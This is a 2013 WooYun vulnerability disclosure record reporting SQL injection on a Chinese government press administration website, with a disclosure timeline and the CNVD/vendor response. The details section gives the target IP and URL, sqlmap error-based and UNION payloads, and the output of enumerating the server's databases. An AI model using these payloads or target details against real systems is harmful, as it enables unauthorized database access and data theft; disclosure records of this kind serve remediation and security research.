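Vulnerability summary

Bug ID: wooyun-2013-028688

Title: SQL injection vulnerability at the General Administration of Press and Publication of the People's Republic of China

Vendor: General Administration of Press and Publication of the People's Republic of China

Author: lucky

Submitted: 2013-07-13 10:26

Fixed: 2013-08-27 10:26

Disclosed: 2013-08-27 10:26

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]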


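Vulnerability details

Disclosure status:

2013-07-13: Details sent to the vendor; awaiting vendor handling
2013-07-17: Vendor confirmed; details disclosed to the vendor only
2013-07-27: Details disclosed to core white hats and experts in related fields
2013-08-06: Details disclosed to regular white hats
2013-08-16: Details disclosed to intern white hats
2013-08-27: Details disclosed to the public

Brief description:

Detailed description: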

http://219.141.187.20/display.aspx?ID=10&Type=statute


---
Place: GET
Parameter: ID
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ID=10 AND 2859=CONVERT(INT,(CHAR(58)+CHAR(107)+CHAR(106)+CHAR(122)+CHAR(58)+(SELECT (CASE WHEN (2859=2859) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(107)+CHAR(108)+CHAR(58)))&Type=statute
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: ID=10 UNION ALL SELECT CHAR(58)+CHAR(107)+CHAR(106)+CHAR(122)+CHAR(58)+CHAR(114)+CHAR(87)+CHAR(98)+CHAR(78)+CHAR(70)+CHAR(102)+CHAR(84)+CHAR(117)+CHAR(73)+CHAR(107)+CHAR(58)+CHAR(109)+CHAR(107)+CHAR(108)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- &Type=statute
---
[03:55:03] [INFO] testing Microsoft SQL Server
[03:55:06] [INFO] confirming Microsoft SQL Server
[03:55:06] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[03:55:06] [INFO] fetching database names
[03:55:09] [INFO] the SQL query used returns 7 entries
[03:55:09] [INFO] retrieved: "CY_Standards"
[03:55:12] [INFO] retrieved: "master"
[03:55:13] [INFO] retrieved: "model"
[03:55:13] [INFO] retrieved: "msdb"
[03:55:13] [INFO] retrieved: "ReportServer"
[03:55:17] [INFO] retrieved: "ReportServerTempDB"
[03:55:20] [INFO] retrieved: "tempdb"
available databases [7]:
[*] CY_Standards
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


Database: CY_Standards                                                         
[126 tables]


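Proof of vulnerability:

Fix:

Copyright notice: when reposting, please credit the source lucky@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2013-07-17 23:23

Vendor reply:

CNVD confirmed and reproduced the reported issue and plans to notify the organization that administers the website by formal letter.
rank 15

Latest status:

None yet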